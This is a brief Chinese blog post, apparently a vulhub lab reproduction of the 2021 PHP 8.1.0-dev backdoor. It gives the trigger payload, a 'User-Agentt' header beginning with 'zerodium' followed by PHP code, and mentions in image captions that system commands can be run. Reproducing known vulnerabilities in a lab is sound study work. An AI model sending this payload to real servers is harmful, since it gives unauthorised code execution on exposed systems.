vulhub 8.1-backdoor漏洞复现

前言

PHP版本8.1.0-dev于2021年3月28日植入了后门,但很快发现并删除了该后门。当服务器上存在此后门时,攻击者可以通过发送User-Agentt标头执行任意代码。

复现

用vulhub搭好环境后
在请求头中构造如下payload

User-Agentt: zerodiumvar_dump(233*233);

vulhub 8.1-backdoor漏洞复现_第1张图片
执行系统命令:
vulhub 8.1-backdoor漏洞复现_第2张图片

你可能感兴趣的:(漏洞复现)